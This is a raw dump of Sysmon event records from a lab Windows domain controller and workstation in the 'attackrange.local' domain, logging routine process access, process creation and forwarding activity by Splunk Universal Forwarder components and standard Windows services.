12:25:48.773{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441596Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.773{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441595Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.772{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-02CC-6088-D628-00000000BA01}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441594Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.772{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CC-6088-D628-00000000BA01}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441593Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.772{42DC5269-02CC-6088-D628-00000000BA01}596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000441592Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.577{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B73797B664164D952F2B17DE0B2822B7,SHA256=1F9C9F766FB49EBAED217418BA822606AE5E3822EC77B3E65F8F3E0977EFE67D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441591Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.390{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22B85425853F2DDA315AECACA80BEFA0,SHA256=83D591E6C18B7C0622417F86083533DA50641F9B0D754D48ED163434D879340B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441590Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.274{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441589Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.274{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441588Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.238{42DC5269-02CC-6088-D528-00000000BA01}47526824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441587Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.107{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CC-6088-D528-00000000BA01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441586Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.106{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441585Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.106{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441584Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.105{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441583Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.105{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441582Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.105{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-02CC-6088-D528-00000000BA01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441581Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.105{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CC-6088-D528-00000000BA01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441580Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:48.105{42DC5269-02CC-6088-D528-00000000BA01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293298Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:49.911{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C5071B20C034BBDF7DDB35796352B51,SHA256=4360DFEC50F801222A6C5B308D7FF43B53D3489EF571E6F12914FE1FAD4D6744,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441614Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.811{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93A3ED0388363957D6A1180F03BB5D7B,SHA256=E5EA541E4B04A03289B8129C97CEF6057E8FDFF2E363A330E3637A1E9F523244,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441613Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.594{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DCDC6BA5F7EE416125C1CE28FBFFDE2,SHA256=E42F16BCB77E9B25676746C6FCC270D2D98B350EAB18FAF44A89F236E1580394,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293297Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:47.425{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50664-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293296Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:49.149{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFF9E289039733F0E08FC1131A7A060A,SHA256=0517FF0554473EFEF25CD0F39370624F0DAAD7CBBDC25B537CEF7E47FD2B71BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441612Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.570{42DC5269-02CD-6088-D728-00000000BA01}62326992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441611Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.440{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-02CD-6088-D728-00000000BA01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441610Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.438{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441609Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.438{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441608Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.437{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441607Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.437{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441606Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.437{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-02CD-6088-D728-00000000BA01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441605Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.437{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-02CD-6088-D728-00000000BA01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000441604Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:49.437{42DC5269-02CD-6088-D728-00000000BA01}6232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 